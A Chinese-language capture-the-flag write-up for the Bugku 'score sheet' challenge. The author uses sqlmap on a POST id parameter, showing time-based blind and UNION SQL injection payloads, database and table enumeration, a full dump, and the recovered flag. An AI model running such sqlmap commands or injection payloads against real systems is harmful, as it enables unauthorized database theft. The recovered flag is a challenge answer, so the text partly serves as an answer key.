成绩单
90
快来查查成绩吧
http://120.24.86.145:8002/chengjidan/
查看元素和查看源代码后无果
用sqlmap检测sql注入
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"得到
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP
---
[11:01:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12检测到了后台数据库是mysql
然后列举数据库管理系统中的所有数据库
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs得到
available databases [2]:
[*] information_schema
[*] skctf_flag也就是有两个数据库,然后列出数据库skctf_flag的所有表
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --tables得到
Database: skctf_flag
[2 tables]
+------+
| fl4g |
| sc |
+------+也就是有两个表,不知道flag在哪个表里,就把两个表都列举出来吧
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump得到
Database: skctf_flag
Table: sc
[3 entries]
+----+------+------+---------+---------+
| id | name | math | chinese | english |
+----+------+------+---------+---------+
| 1 | 龙龙龙 | 60 | 70 | 60 |
| 2 | 浩儿 | 70 | 74 | 84 |
| 3 | 静静 | 80 | 90 | 85 |
+----+------+------+---------+---------+
[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv'
[11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
[11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times
BUGKU
[11:18:42] [ERROR] invalid character detected. retrying..
[11:18:42] [WARNING] increasing time delay to 3 seconds
{Sq
[11:20:01] [ERROR] invalid character detected. retrying..
[11:20:01] [WARNING] increasing time delay to 4 seconds
l_INJE
[11:21:48] [ERROR] invalid character detected. retrying..
[11:21:48] [WARNING] increasing time delay to 5 seconds
CT0N_4
[11:24:01] [ERROR] invalid character detected. retrying..
[11:24:01] [WARNING] increasing time delay to 6 seconds
81
[11:24:54] [ERROR] invalid character detected. retrying..
[11:24:54] [WARNING] increasing time delay to 7 seconds
3dr
[11:26:24] [ERROR] invalid character detected. retrying..
[11:26:24] [WARNING] increasing time delay to 8 seconds
d
[11:27:10] [ERROR] invalid character detected. retrying..
[11:27:10] [WARNING] increasing time delay to 9 seconds
8hz4}
Database: skctf_flag
Table: fl4g
[1 entry]
+---------------------------------+
| skctf_flag |
+---------------------------------+
| BUGKU{Sql_INJECT0N_4813drd8hz4} |
+---------------------------------+